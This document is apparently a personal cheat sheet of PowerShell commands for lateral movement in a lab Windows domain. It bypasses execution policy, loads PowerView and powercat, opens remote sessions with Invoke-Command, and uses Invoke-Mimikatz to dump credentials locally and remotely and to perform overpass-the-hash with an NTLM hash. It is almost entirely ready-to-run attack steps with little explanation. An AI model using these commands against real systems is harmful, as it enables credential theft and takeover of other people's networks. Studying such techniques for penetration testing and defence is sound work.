Lateral Movement PS Remoting

One to one

We required admin rights PS shell to perform all this task .

PS C:\WINDOWS\system32> Enable-PSRemoting –Force

PS C:\Users\victim.SECURITY\Downloads\PowerTools-master\PowerTools-master\PowerView> powershell.exe -executionpolicy bypass

PS C:\Users\victim.SECURITY\Downloads\PowerTools-master\PowerTools-master\PowerView> powershell.exe -nop -exec bypass

PS C:\Users\victim.SECURITY\Downloads\PowerTools-master\PowerTools-master\PowerView> . .\powercat.ps1

PS C:\Users\victim.SECURITY\Downloads\PowerTools-master\PowerTools-master\PowerView> . .\powerview.ps1

PS C:\Users\victim.SECURITY\Downloads\PowerTools-master\PowerTools-master\PowerView> Find-LocalAdminAccess

PS C:\Users\victim.SECURITY\Downloads\PowerTools-master\PowerTools-master\PowerView> New-PSSession -ComputerName WIN-2RUMVG5JPOC.security.local

PS C:\Users\victim.SECURITY\Downloads\PowerTools-master\PowerTools-master\PowerView> Enter-PSSession -Id 1

[WIN-2RUMVG5JPOC.security.local]: PS C:\Users\Administrator\Documents> whoami

[WIN-2RUMVG5JPOC.security.local]: PS C:\Users\Administrator\Documents> whoami /priv

[WIN-2RUMVG5JPOC.security.local]: PS C:\Users\Administrator\Documents> $proc = Get-Process

[WIN-2RUMVG5JPOC.security.local]: PS C:\Users\Administrator\Documents> $proc

PS C:\Users\victim.SECURITY\Downloads\PowerTools-master\PowerTools-master\PowerView> $sess = New-PSSession -ComputerName WIN-2RUMVG5JPOC.security.local

PS C:\Users\victim.SECURITY\Downloads\PowerTools-master\PowerTools-master\PowerView> $sess

PS C:\Users\victim.SECURITY\Downloads\PowerTools-master\PowerTools-master\PowerView> Enter-PSSession -Session $sess

One to many :

PS C:\Users\victim.SECURITY\Downloads\PowerTools-master\PowerTools-master\PowerView> Invoke-Command -ComputerName WIN-2RUMVG5JPOC.security.local -ScriptBlock {whoami;hostname}

PS C:\Users\victim.SECURITY\Downloads\PowerTools-master\PowerTools-master\PowerView> Invoke-Command -ComputerName WIN-2RUMVG5JPOC.security.local -ScriptBlock {$ExecutionContext.SessionState.LanguageMode}

PS C:\Users\victim.SECURITY\Downloads\PowerTools-master\PowerTools-master\PowerView> $ExecutionContext.SessionState.LanguageMode

PS C:\Users\victim.SECURITY\Downloads\PowerTools-master\PowerTools-master\PowerView> help *language*

PS C:\Users\victim.SECURITY\Downloads\PowerTools-master\PowerTools-master\PowerView> help *mode*

PS C:\Users\victim.SECURITY\Downloads\PowerTools-master\PowerTools-master\PowerView> notepad hello.ps1

Put this in notepad

Save it in hello.ps1

PS C:\Users\victim.SECURITY\Downloads\PowerTools-master\PowerTools-master\PowerView> . .\hello.ps1                                                                                             

PS C:\Users\victim.SECURITY\Downloads\PowerTools-master\PowerTools-master\PowerView> hello

PS C:\Users\victim.SECURITY\Downloads\PowerTools-master\PowerTools-master\PowerView> Invoke-Command -ComputerName WIN-2RUMVG5JPOC.security.local -ScriptBlock ${function:hello}

PS C:\Users\victim.SECURITY\Downloads\PowerTools-master\PowerTools-master\PowerView> ls function:

PS C:\Users\victim.SECURITY\Downloads\PowerTools-master\PowerTools-master\PowerView> $sess

PS C:\Users\victim.SECURITY\Downloads\PowerTools-master\PowerTools-master\PowerView> Invoke-Command -FilePath C:\Users\victim.SECURITY\Downloads\PowerTools-master\PowerTools-master\PowerView\hello.ps1 -Session $sess

PS C:\Users\victim.SECURITY\Downloads\PowerTools-master\PowerTools-master\PowerView> Enter-PSSession -Session $sess                                                                            

[WIN-2RUMVG5JPOC.security.local]: PS C:\Users\Administrator\Documents> hello                  

[WIN-2RUMVG5JPOC.security.local]: PS C:\Users\Administrator\Documents> exit

Use below to execute stateful commands using invoke-command :

PS C:\Users\victim.SECURITY\Downloads\PowerTools-master\PowerTools-master\PowerView> Invoke-Command -Session $sess -ScriptBlock {$proc = get-process}                                          

PS C:\Users\victim.SECURITY\Downloads\PowerTools-master\PowerTools-master\PowerView> Invoke-Command -Session $sess -ScriptBlock {$proc.name}

Lateral movement invoke-mimikatz :

https://github.com/PowerShellMafia/PowerSploit

with normal rights on PS shell

PS C:\Users\victim.SECURITY\Downloads\PowerSploit-master\PowerSploit-master\Exfiltration> . .\Invoke-Mimikatz.ps1

Dump credentials on a  local machine :

PS C:\Users\victim.SECURITY\Downloads\PowerSploit-master\PowerSploit-master\Exfiltration> Invoke-Mimikatz -DumpCreds

Dump credentials on multiple remote machine :

PS C:\Users\victim.SECURITY\Downloads\PowerSploit-master\PowerSploit-master\Exfiltration> Invoke-Mimikatz –DumpCreds –Computername WIN-2RUMVG5JPOC.security.local

Over pass the hash generate tokens from hashes :

PS C:\Users\victim.SECURITY\Downloads\PowerSploit-master\PowerSploit-master\Exfiltration> Invoke-Mimikatz  -command ‘” sekurlsa::pth/user:Administrator /domain:security.local /ntlm:<ntlmhash> /run:pwershell.exe”’

@Saksham Dixit